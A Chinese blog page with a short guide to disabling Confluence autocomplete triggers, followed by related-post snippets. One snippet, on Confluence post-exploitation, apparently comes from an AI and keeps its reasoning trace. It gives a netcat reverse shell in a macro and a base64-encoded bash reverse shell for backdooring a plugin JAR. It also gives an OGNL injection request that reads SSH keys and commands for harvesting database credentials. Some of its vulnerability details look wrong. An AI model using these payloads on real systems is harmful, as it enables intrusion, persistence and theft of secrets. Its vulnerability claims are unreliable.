Confluence 启用和禁用自动完成

最新推荐文章于 2023-08-12 12:06:13 发布
转载 最新推荐文章于 2023-08-12 12:06:13 发布 · 1.1k 阅读 · 0

本文介绍如何在Confluence中禁用特定字符的自动完成功能,包括禁用与重新启用的方法,以及此设置对不同用户的适用情况。
你可以关闭字符 '[' 和 '!' 的自动完成触发。这样当你输入上面的 2 个触发字符的时候,自动完成功能也不会被启用,当然你也可以将这个功能再次启用。

注意:

这个设置对使用键盘的自动完成无效(Ctrl+Shift+K and Ctrl+Shift+M),尽管编辑器中的特殊字符自动完成触发被禁用了,你还是可以使用键盘的自动完成快捷键的。

这个设置只对你自己有效,其他使用 Confluence 的用户可以通过调整他们的用户属性来确定自己的自动完成功能是不是启用。

自动完成功能在系统安装后是默认启用。

启用和禁用特殊字符的自动完成功能方法如下:

在顶部右侧的屏幕中选择你的属性头像,然后选择设置。

在左侧面板上 你的设置(Your Settings)下你可以看到 编辑(Editor )标签。

选择 编辑(Editor ).

你可以进行下面的 2 个操作:

禁用自动完成 - 通过选择  禁用自动完成(Disable Autocomplete)。

启用自动完成 - 通过不选择 禁用自动完成(Disable Autocomplete)。

选择 提交(Submit)。

屏幕截图:用户设置编辑框



来源: http://cwiki.ossez.com/pages/viewpage.action?pageId=2393207
OSSEZTEC
关注
6、Confluence空间设置与内容管理全攻略
salt9的博客
07-22 49
本文详细介绍了如何在Confluence中进行空间设置与内容管理,包括空间的创建与关闭、空间类别设置、基础操作导航、页面内容管理以及模板插件的使用。通过这些方法,可以高效地组织管理团队知识,提升协作效率。
14、Confluence定制指南:从基础到高级的全面攻略
v5w6x的博客
07-10 59
本文详细介绍了如何从基础到高级全面定制Confluence,包括空间细节修改、文档主题配置、外观与感觉调整以及高级定制功能。通过这些方法,可以满足企业品牌化展示、项目文档管理个人知识管理等多样化需求,为团队协作知识管理提供更优质的体验。
confluence启动关闭
weixin_33937913的博客
01-21 3563
cd /opt/atlassian/confluence/bin startup.sh shutdown.sh
Confluence 6 配置校验识别
HONEY MOOSE
07-29 293
校验你的设置 查看你 Confluence 当前使用的设置,请参考 Viewing System Properties 页面中的内容。 识别系统属性 请参考 Recognized System Properties 页面中的内容来找到针对你安装 Confluence 版本可以配置的系统属性参数。   https://www.cwiki.us/display/CONF6ZH/Configu...
Confluence 6 LDAP 高级设置
HONEY MOOSE
04-07 1445
 启用嵌套组(Enable Nested Groups)为嵌套组启用禁用支持。一些目录服务器能够允许你在一个组中定义另外一个组。在这种结构下的用户组称为用户组嵌套。嵌套组的配置能够让子用户组继承上级用户组的权限,是系统的权限配置变得简单。管理本地用户状态(Manage User Status Locally)如果设置为 True,你可以在 Crowd 中激活或者取消激活用户。这个配置基于你目录服...
confluence保姆级教程,安装设置开机启动教程完整版
rambzz的博客
05-15 1912
setsid ./start-confluence.sh # setsid把进程挂到后台。######编辑confluence文件位置。######编辑confluence文件位置。#####需要配置jdk的环境变量。#####配置jdk环境变量。在文件末尾添加如下内容。
confluence插件tableenhancer
04-16
3. **易用性**:插件的界面直观,用户可以通过简单的设置步骤快速启用禁用固定表头功能。 4. **性能优化**:尽管增加了额外的功能,但Table Enhancer在设计时考虑了性能,确保不会对Confluence的整体运行速度造成...
使用Crowd(SSO)导致Confluence无法登陆,启用紧急修复管理员
ClumsyCat的专栏
05-29 4249
使用紧急修复管理员 关掉Confluence 编辑<installation-directory>/bin/setenv.sh或者setenv.bat,在Catalina属性中添加 -Datlassian.recovery.password=<your-password> 通过<installation-directory>/bin/start-confl...
CONFLUENCE 订阅页面更新邮件通知
03-13
在介绍Confluence订阅页面更新邮件通知的相关知识点时,我们需要从多个维度进行说明,这些维度包括:Confluence的基本介绍、邮件通知功能的原理作用、如何设置邮件通知、邮件通知的具体参数及其用途,以及如何管理...
通过设备名称开启禁用设备的DLL VB使用范例
04-07
这是本人用VC开发的一个API接口函数库: GetDeviceState SetDeviceState CreateNetworkConnect DeleteNetworkConnect ConnectNetwork CloseNetwork 包里还有VB调用这些函数的范例
Confluence 6 删除或禁用用户
HONEY MOOSE
03-28 1935
你可以 删除(delete)没有在你 Confluence 站点中添加或者编辑过内容的用户。这些内容包括页面,博客内容编辑已经存在页面的跟帖,意见等。如果用户在你的 Confluence 系统中贡献过内容,你应该选择的是 禁用(disable)用户账户。禁用用户账户不会对用户已经创建的内容进行删除。如果一个用户已经被你禁用了,这个用户将不能使用其用户名登录系统,同时这个用户也不会被计算在 Con...
Confluence 6 删除或禁用用户备忘
HONEY MOOSE
03-28 516
管理用户(Administer User)仅仅在你具有管理员权限的时候可见。你也可以使用 Administration Console 来删除禁用用户。你可以使用 edit the groups 来编辑用户所属的用户组。可以使用用户组来修改用户的一些特定的权限而避免完全禁止用户访问 Confluence。多用户目录(Multiple user directories) – 你可以在 Conflu...
应对confluence自动停服的自启shell脚本
qq_43203689的博客
08-12 291
在crontab中添加 */30 * * * * /usr/tool/confluenceStart.sh 表示每30分钟运行一次。让定时任务运行一个脚本,这个脚本内容主要是检查 confluence是否运行中,不在运行状态就启动。confluence文档工具,每过几天就会自动停机,导致第二天confluence打不开。运行命令 chmod 777 /usr/tool/confluenceStart.sh。
服务器异常关闭下重启confluence
runwuwushengxiyu的博客
08-21 470
服务器异常关闭下重启confluence
Confluence自启动脚本
weixin_30307267的博客
12-27 362
由于confluence用rc.local是无法自启动的,所以这里附上confluence的启动脚本 将以下脚本拷贝到/etc/init.d/confluenced #cd/etc/init.d/ #viconfluenced 注意:以下几个变量要根据自己的位置来调整Confluence,JAVA_HOME ------------------------------------...
docker centos容器 二进制安装confluence 开机容器自启服务自启
故南思北的博客
08-11 673
docker centos容器 二进制安装confluence 开机容器自启服务自启
Confluence设置开机启动
06-26 3268
vi /etc/init.d/confluence ----------------------------- #!/bin/bash # chkconfig: 2345 85 15 # Provides: atlassian # Short-Description: Start and ...
对jiraconfluence的自启动
浪客的博客
04-20 3752
在/etc/init.d/目录中创建JIRA启动脚本#cd /etc/ini.d/#vim jira#!/bin/bash#chkconfig: 2345 85 15# description: jira# processname: jira# source function library./etc/init.d/functions#把JAVA的环境变量配置也加进来export JAVA_HOM...
confluence后渗透
最新发布
07-23
<think>嗯,用户要求了解Confluence系统的后渗透测试方法安全攻击分析。用户可能是安全工程师或渗透测试人员,需要深入的技术细节来评估Confluence系统的安全性。 从引用内容看,用户关注的是企业级应用的安全测试,特别是后渗透阶段的技术。Confluence作为Atlassian的核心协作工具,一旦被攻破可能造成企业知识库泄露,危害极大。 需要覆盖几个关键层面: 首先是权限维持技术,比如在Confluence中植入恶意宏或插件,利用其定时任务功能实现持久化。这里要强调OAuth令牌的利用,因为Confluence常集成其他Atlassian产品。 数据窃取方面要具体说明API利用方式,比如通过REST API批量导出空间数据,或者利用Velocity模板注入执行系统命令。这些在CVE-2022-26134等漏洞中都有实际案例。 横向移动要结合Atlassian生态,比如通过Confluence服务器作为跳板访问Jira数据库。这里需要提醒MySQL凭据的获取方式,以及解密算法。 最后防御建议必须实用,比如禁用宏功能的操作路径,以及正则表达式过滤的示例。云环境下的责任共担模型也要明确区分用户厂商的安全边界。 用户可能还关心如何检测这些攻击,所以补充了EDR审计日志的关键监控点。这些内容都力求符合用户"后渗透测试"的核心需求,避免泛泛而谈安全理论。 相关问题的设计也延续了深度技术路线,特别是漏洞利用权限模型分析,这应该是专业人员最关注的后续方向。</think>以下是Confluence后渗透测试方法及安全攻击分析的专业指南,涵盖攻击路径、技术手段及防御措施: --- ### 一、后渗透测试核心路径 1. **权限维持技术** - **恶意宏注入**:在Confluence页面插入包含恶意代码的宏(如`{python}import os;os.system("nc -e /bin/sh 攻击者IP 端口")`),利用模板渲染执行命令[^1] - **插件后门**:篡改合法插件(如`draw.io`)的JAR包,添加反向Shell代码(Java示例): ```java Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS80NDQgMD4mMQ==}|{base64,-d}|{bash,-i}"); ``` - **定时任务持久化**:通过Confluence的**定时任务管理**功能创建恶意计划任务(需Admin权限) 2. **数据窃取技术** - **数据库凭据提取**: ```bash grep -r "jdbc:" /var/atlassian/application-data/confluence/ # 查找配置文件中的数据库密码 ``` - **空间数据批量导出**:利用REST API自动化导出所有空间(需认证): ```http GET /rest/api/space?limit=1000 GET /rest/api/content?spaceKey=KEY&expand=body.storage ``` - **附件窃取**:通过SQL注入直接访问数据库(CVE-2019-3396漏洞): ```sql SELECT * FROM CONTENT WHERE CONTENTTYPE='ATTACHMENT'; ``` 3. **横向移动技术** - **SSH密钥窃取**:通过Velocity模板注入(CVE-2022-26134)获取服务器权限: ```http POST /pages/doenterpagevariables.action HTTP/1.1 Content-Type: application/x-www-form-urlencoded queryString=eval(@java.lang.Runtime@getRuntime().exec("cat ~/.ssh/id_rsa")) ``` - **Jira横向渗透**:利用Confluence与Jira的集成凭证(`confluence.cfg.xml`中的`hibernate.connection.password`解密) --- ### 二、关键漏洞利用案例 | 漏洞编号 | 影响版本 | 利用方式 | 风险等级 | |------------|------------------|------------------------------|----------| | CVE-2023-22515 | < 8.6.0 | 未授权创建管理员账户 | 严重 | | CVE-2022-26134 | < 7.4.17 | OGNL注入远程代码执行 | 严重 | | CVE-2021-26084 | < 7.12.5 | 模板注入导致命令执行 | 高危 | | CVE-2019-3396 | < 6.15.2 | Widget Connector宏代码执行 | 高危 | --- ### 三、防御加固方案 1. **权限控制** - 启用**强制双因素认证**(2FA) - 遵循最小权限原则,禁用匿名访问 ```xml <!-- 在confluence-init.properties中设置 --> confluence.access.mode=private ``` 2. **安全配置** - 禁用高风险宏(Snippet Macro、Widget Connector) - 配置**Web应用防火墙**(WAF)规则拦截OGNL表达式: ``` \${\w+\(.*\)}|\#\{\w+\(.*\)} ``` 3. **监控检测** - 审计日志重点关注: - 异常Velocity模板渲染(`*.vm`文件修改) - 非常规时间的管理员登录 - 附件目录的异常文件写入(`.jsp`, `.war`) - 部署EDR工具监控`java`进程的子进程创建行为 --- ### 四、云环境特别防护 对于Atlassian Cloud实例(如confluence.atlassian.net): 1. 启用**IP白名单**功能限制访问源 2. 配置**数据驻留**策略满足合规要求 3. 定期审查**已授权OAuth应用**权限范围 > **攻防本质**:后渗透的核心在于**权限维持与数据流转控制**。Confluence作为企业知识中枢,攻击者往往以其为跳板实施供应链攻击[^2]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值